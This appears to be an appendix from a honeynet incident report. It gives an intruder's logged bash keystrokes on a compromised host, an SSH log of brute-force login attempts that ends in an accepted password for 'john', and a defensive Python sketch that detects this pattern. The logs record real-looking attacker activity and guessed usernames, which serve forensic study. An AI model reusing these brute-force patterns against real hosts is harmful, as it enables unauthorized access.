[2008-09-21 02:23:49 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#w
[2008-09-21 02:25:18 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:20 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd fast
[2008-09-21 02:25:21 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:26 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd r
[2008-09-21 02:25:27 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:33 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77464 COM:bash ]#rinsult.e
[2008-09-21 02:25:34 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat rawa[BS][BS][BS]in
[2008-09-21 02:25:36 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:25:36 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:45 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls -l
[2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech3.users
[2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech1.users
[2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech2.users
[2008-09-21 02:25:58 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77493 COM:bash ]#mech1.users
[2008-09-21 02:25:59 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat me1
[2008-09-21 02:26:05 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#[U-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][BS]2
[2008-09-21 02:26:13 Host:130.195.4.20 UID:1001 PID:1281079 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:26:17 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77507 COM:bash ]#linux
[2008-09-21 02:26:17 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat li
[2008-09-21 02:26:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#[ESC][?1;2c[ESC][?1;2c[ESC][?1;2c
[2008-09-21 02:26:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#
[2008-09-21 02:26:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:26:35 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77519 COM:bash ]#m.pid
[2008-09-21 02:26:35 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat m.p
[2008-09-21 02:26:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77528 COM:bash ]#m.ses
[2008-09-21 02:26:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77528 COM:bash ]#m.set
[2008-09-21 02:26:40 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77536 COM:bash ]#m.ses
[2008-09-21 02:26:40 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat m.ses
[2008-09-21 02:27:23 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#e[BS]w
[2008-09-21 02:27:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#exit
SSH Logs
Sep 21 10:51:55 paul-desktop sshd[8838]: Failed password for invalid user t1na from 82.99.173.209 port 60061 ssh2
Sep 21 10:51:58 paul-desktop sshd[8840]: Failed password for invalid user alexis from 82.99.173.209 port 60193 ssh2
Sep 21 10:52:00 paul-desktop sshd[8842]: Failed password for invalid user t1na from 82.99.173.209 port 60291 ssh2
Sep 21 10:52:00 paul-desktop sshd[8844]: Failed password for invalid user a from 82.99.173.209 port 60360 ssh2
Sep 21 10:52:02 paul-desktop sshd[8846]: Failed password for invalid user art from 82.99.173.209 port 60489 ssh2
Sep 21 10:52:04 paul-desktop sshd[8848]: Failed password for invalid user slim from 82.99.173.209 port 60587 ssh2
Sep 21 10:52:04 paul-desktop sshd[8850]: Failed password for invalid user logic from 82.99.173.209 port 60675 ssh2
Sep 21 10:52:05 paul-desktop sshd[8852]: Failed password for invalid user b from 82.99.173.209 port 60709 ssh2
Sep 21 10:52:07 paul-desktop sshd[8854]: Failed password for invalid user shortcut from 82.99.173.209 port 60838 ssh2
Sep 21 10:52:07 paul-desktop sshd[8855]: Failed password for invalid user desiree from 82.99.173.209 port 60912 ssh2
Sep 21 10:52:08 paul-desktop sshd[8858]: Failed password for invalid user eminem from 82.99.173.209 port 60986 ssh2
Sep 21 10:52:08 paul-desktop sshd[8860]: Failed password for invalid user diablo from 82.99.173.209 port 32783 ssh2
Sep 21 10:52:10 paul-desktop sshd[8862]: Failed password for invalid user haitac from 82.99.173.209 port 32886 ssh2
(...)
Sep 21 10:52:48 paul-desktop sshd[9016]: Failed password for invalid user maria from 82.99.173.209 port 38176 ssh2
Sep 21 10:52:49 paul-desktop sshd[9020]: Failed password for invalid user natasha from 82.99.173.209 port 38439 ssh2
Sep 21 10:52:50 paul-desktop sshd[9028]: Failed password for invalid user skywalker from 82.99.173.209 port 38688 ssh2
Sep 21 10:52:50 paul-desktop sshd[9022]: Failed password for invalid user conter from 82.99.173.209 port 38607 ssh2
Sep 21 10:52:50 paul-desktop sshd[9023]: Failed password for invalid user ha from 82.99.173.209 port 38608 ssh2
Sep 21 10:52:50 paul-desktop sshd[9024]: Failed password for invalid user claudius from 82.99.173.209 port 38613 ssh2
Sep 21 10:52:51 paul-desktop sshd[9030]: Failed password for invalid user maria from 82.99.173.209 port 38732 ssh2
Sep 21 10:52:52 paul-desktop sshd[9031]: Failed password for invalid user maryjane from 82.99.173.209 port 38767 ssh2
Sep 21 10:52:52 paul-desktop sshd[9033]: Failed password for invalid user putty from 82.99.173.209 port 38796 ssh2
Sep 21 10:52:52 paul-desktop sshd[9036]: Accepted password for john from 82.99.173.209 port 1372 ssh2
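The SSH log above ends with an accepted login that follows a run of failed attempts from the same source address. The following is a minimal Python sketch of how such a pattern could be flagged automatically. It is an illustration only and not part of the honeynet tooling used in this report: the function name find_bruteforce_successes, the regular expression and the threshold parameter are all assumptions made for this example, and the pattern covers only the sshd line format shown in this appendix.

```python
import re
from collections import Counter

# Assumed line format: matches only the sshd "Failed/Accepted password"
# messages as they appear in this appendix.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def find_bruteforce_successes(lines, threshold=5):
    """Return (ip, user, failures) for every accepted login that was
    preceded by at least `threshold` failed attempts from the same IP.
    The threshold is a hypothetical tuning parameter."""
    failures = Counter()
    hits = []
    for line in lines:
        match = LINE_RE.search(line)
        if match is None:
            continue  # skip "(...)" markers and unrelated lines
        ip = match.group("ip")
        if match.group("result") == "Failed":
            failures[ip] += 1
        elif failures[ip] >= threshold:
            hits.append((ip, match.group("user"), failures[ip]))
    return hits


# The last four records of the SSH log in this appendix.
sample = [
    "Sep 21 10:52:51 paul-desktop sshd[9030]: Failed password for invalid user maria from 82.99.173.209 port 38732 ssh2",
    "Sep 21 10:52:52 paul-desktop sshd[9031]: Failed password for invalid user maryjane from 82.99.173.209 port 38767 ssh2",
    "Sep 21 10:52:52 paul-desktop sshd[9033]: Failed password for invalid user putty from 82.99.173.209 port 38796 ssh2",
    "Sep 21 10:52:52 paul-desktop sshd[9036]: Accepted password for john from 82.99.173.209 port 1372 ssh2",
]

for ip, user, count in find_bruteforce_successes(sample, threshold=3):
    print(f"{ip}: login as {user} accepted after {count} failed attempts")
```

Counting failures per source address rather than per user name suits this log, because the attacker cycles through many user names from a single address before one guess succeeds.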